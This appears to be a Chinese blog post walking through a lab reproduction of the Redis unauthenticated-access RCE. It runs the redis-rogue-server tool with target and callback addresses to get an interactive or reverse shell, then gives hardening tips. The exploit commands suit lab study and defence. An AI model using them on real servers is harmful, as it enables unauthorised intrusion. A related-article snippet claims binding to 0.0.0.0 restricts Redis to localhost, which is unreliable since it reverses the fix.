Redis未授权访问利用RCE进行漏洞复现

最新推荐文章于 2024-04-22 17:24:40 发布
置顶 最新推荐文章于 2024-04-22 17:24:40 发布
阅读量1.8k 收藏 6
点赞数 3
分类专栏: 漏洞专栏 文章标签: redis 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Trouble_99/article/details/111561636
版权

前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。

目录

漏洞概述

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导致用户未授权访问,可能导致,SSH远程登录,写入webshell,交互式shell,反弹shell等操作。

影响版本

Redis 2.x,3.x,4.x,5.x

环境搭建和漏洞复现

一台Ubuntu装好vulhub虚拟机(此漏洞推荐使用Centos系统进行测试),且安装下载好 vulhub靶场,ip地址 :192.168.0.115
如何安装vulhub,参考官方文档

一台kali虚拟机,ip地址:192.168.0.111

1.环境启动

cd /vulhub/redis/4-unacc   //这里须进入绝对路径下,具体以下载版本为准。
docker-compose up -d    //启动环境,需花费一点时间
docker ps         //查看开启的漏洞环境

在这里插入图片描述
kali 访问 :192.168.0.115:6379,漏洞启动成功。

在这里插入图片描述

2.下载使用RCE

这里推荐下载github上的 RCE地址
推荐这个的原因是已存在 .so文件不需要去其他地方下载或者编译。

可直接用kali下载。

git clone https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-server
ls

在这里插入图片描述

RCE使用。

python3 redis-rogue-server.py -h    //查看使用命令
python3 redis-rogue-server.py --rhost 192.168.0.115 --rport 6379 --lhost 192.168.0.111 --exp exp.so  //这里通过帮助构造命令,rhost,rport为靶机的ip和端口,lhost为kali ip地址。

在这里插入图片描述
交互模式使用:输入字母 i 即可。
在这里插入图片描述
反弹shell模式:需提前监听好端口,后按字母 r 输入kali的ip和端口(默认21000)即可。

在这里插入图片描述注意:这里如果出现连接不上交互或者反弹shell的模式,可能是虚拟机是Ubuntu的问题,也可能是靶场本身存在问题,可以重启靶机或关闭靶场环境在开启。

小编这里就没尝试:写入ssh-keygen公钥然后使用私钥登陆,定时任务反弹shell,写入webshell等操作了,因靶场环境是Ubuntu的原因,所以推荐使用 Centos系统进行复现。

漏洞防御

如要开启远程连接,服务器一定要开启protected-mode(保护模式)设置ip白名单。
修改连接redis的密码,密码满足3/4原则。
修改默认端口6379 为其它端口。
pikeboom
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问漏洞复现
马赛克的博客
04-10 1万+
一:漏洞简介和危害 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上; 如果没有设置密码认证(一般为空)的情况下,会导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。 攻击者访问之后,利用Redis自身提供的config命令,可以进行写文件操作 可以成功把...
Redis授权访问漏洞简单复现
m0_48867141的博客
03-22 3895
1.Redis简介 Redis是一个开源的,可持久化的日志型,Key-Value数据库。 2.漏洞简介 Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访...
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1874
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
redis 授权访问漏洞详解
最新发布
m0_69043895的博客
04-22 1241
1、redis 绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网。2、没有设置密码认证(默认密码为空),可以免密码远程登录redis服务。
Redis进行RCE利用总结
weixin_50464560的博客
11-07 1916
百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。连接到redis,输入以下指令利用crontab反弹shell。Redis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务,且已知工作目录为。kali中打开一个新的命令行窗口执行。
数据库安全-Redis授权&Hadoop&Mysql&授权访问&RCE 漏洞复现
rumil的博客
10-13 1372
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的授权常见页面的授权 /admin.php /menu.php常见的授权访问漏洞及默认端口:默认端口统计:8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待。
Redis主从复制实现RCE
rev1ve的博客
12-01 2233
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
红队攻防实战之Redis-RCE集锦
自强不息
12-08 645
心若有所向往,何惧道阻且长
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 972
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis主从复制
weixin_63231007的博客
02-28 1710
redis主从复制原理以及简单演示(环境真难搭)
redis攻防
weixin_59762059的博客
06-09 140
redis
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
wangluoanquan111的博客
08-01 312
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 5106
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
Redis基于主从复制的RCE
m0_58596609的博客
10-13 2452
Redis基于主从复制的RCE
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在redis.conf配置文件中设置requirepass参数,或者在Redis启动后使用config set命令设置。 3. 使用iptables等防火墙软件,限制Redis服务只能被信任的IP地址访问。 ``` 相关问题:

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值